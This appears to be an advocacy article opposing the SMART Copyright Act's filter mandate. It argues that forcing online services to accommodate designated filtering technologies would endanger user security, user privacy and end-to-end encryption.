Among its many other problems, the Strengthening Measures to Advance Rights Technologies Copyright Act would mandate a slew of filtering technologies that online service providers must "accommodate." And that mandate is broad, so poorly-conceived, and so technically misguided that it will inevitably create serious privacy and security risks. 

Since 1998, the Digital Millennium Copyright Act (DMCA) has required services to accommodate "standard technical measures" to reduce infringement. The DMCA’s definition of standard technical measures (STMs) requires them to be developed by a broad consensus in an open, fair, multi-industry, and perhaps most importantly voluntary process. In other words, current law reflects an understanding that most technologies shouldn’t be adopted as standards because standards affect many, many stakeholders who all deserve a say.

But the filter mandate bill is clearly designed to undermine the measured provisions of the DMCA. It changes the definition of standard technical measures to also include technologies supported by only a small number of rightsholders and technology companies. 

It also adds a new category of filters called "designated technical measures" (DTMs), which must be "accommodated" by online services. "Accommodating" is broadly defined as "adapting, implementing, integrating, adjusting, and conforming" to the designated technical measure. A failure to do so could mean losing the DMCA’s safe harbors and thereby risking crushing liability for the actions of your users.  

The Copyright Office would be in charge of designating those measures. Anyone can petition for such a designation, including companies that make these technologies and want to guarantee a market for them.

The sheer breadth of potential petitions would put a lot of pressure on the Copyright Office—which exists to register copyrights, not evaluate technology. It would put even more pressure on people who have internet users' rights at heart—independent creators, technologists, and civil society—to oppose the petitions and present evidence of the dangers they'd produce. Those dangers are far too likely, given the number of technologies that the new rules would require services to "accommodate."

Requiring This "Accommodation" Would Endanger Security

The filter mandate allows the Copyright Office to mandate "accommodation" for both specific technologies and general categories of technologies. That opens up a number of security issues.

There’s a reason that standardization is a long, arduous process, and it’s to find all the potential problems before requiring it across the board. Requiring unproven, unaudited technology to be universally distributed would be a disaster for security.

Consider a piece of software developed to scan uploaded content for copyrighted works. Even leaving aside questions of fair use, the bill text places no constraints on the security expertise of the developer. At large companies, third-party software is typically thoroughly audited by an in-house security team before being integrated into the software stack. A law, especially one requiring only the minimal approval of the Copyright Office, should not be able to bypass these checks, and certainly shouldn’t require it for companies without the resources to do them themselves. Poorly implemented software leaves potential security vulnerabilities that might be exploited by malicious hackers to exfiltrate the personal information of a service’s users.

Security is hard enough as it is. Mistakes that lead to database breaches happen all the time even with teams doing their best at security; who doesn’t have free credit reporting from a breach at this point? With this bill, what incentive does a company that makes content-matching technology have to invest the time and money into building secure software? The Copyright Office isn’t going to check for buffer overflows. And what happens when a critical vulnerability is found after software has been approved and widely implemented? Companies will have to choose between giving up their DMCA protection and potentially being sued out of existence by turning it off or letting their users be affected by the bug. No one wins in that scenario, and users lose the most.

"Accommodation" Would Also Hurt Privacy

Similar concerns arise over privacy. It’s bad enough that potential bugs could be exploited to divulge user data, but this bill also leaves the door wide open for direct collection of user data. That’s because a DTM could include a program that identifies potential infringement by collecting personal data while a service is being used and then sends that data directly to an external party for review. The scale of such data collection would blow the Cambridge Analytica scandal out of the water, as it would be required across all services, for all of their users. It’s easy to imagine how such functionality would be a dream for copyright enforcers—a direct way to track down and contact infringers, no action required by the service provider—and a nightmare for user privacy.

Even technology that collects information only when it detects use of copyrighted media on a service would be disastrous for privacy. The bill places no restrictions on the channels for content sharing that would fall under these provisions. Publicly viewable content is one thing, but providers could be forced to apply scanning technology to all content that crosses a platform—even if it’s only sent in a private message. Worse, this bill could be used to require platforms to scan the contents of encrypted messages between users, which would fundamentally break the promise of end-to-end encryption. If someone sends a message to a friend, but the scanning software tattles on them to the service or even directly to a media company, that’s simply not end-to-end encryption. Even in the best case, assuming that the software works perfectly as intended, there’s no way to require it across all activities of a service and also allow end-to-end encryption. If information about the contents of a message can be leaked, that message can’t be considered encrypted. In practice, this would happen regularly even for fair use content, as a human would likely have to review it.

The Copyright Office is supposed to "consider" the effect a technology would have on privacy and data security, but it doesn’t have to make it a priority over the  multitude of factors it must also "consider." Furthermore, evaluating the privacy and security concerns requires a level of technological expertise that is outside the office's current scope. If a company says that its technology is safe and there is no independent technologist to argue against it, the Copyright Office might just accept that representation. A company has an interest in defining "secure" and "private" in a way that they can claim their product meets; a user or security expert might define it very differently. Companies also do not have an interest in saying exactly how their technology does what it claims, making it even harder to evaluate the security and privacy issues it might raise. Again, the burden is on outside experts to watch the Copyright Office proceedings and provide information on behalf of the millions of people who use the internet. 

This bill is a disaster in the making. Ultimately, it would require any online service, under penalty of owing hundreds of thousands of dollars to major rightsholders, to endanger the privacy and security of their users. We all have a right to free expression, and we should not have to sacrifice privacy and security when we rely on a platform to exercise that right online.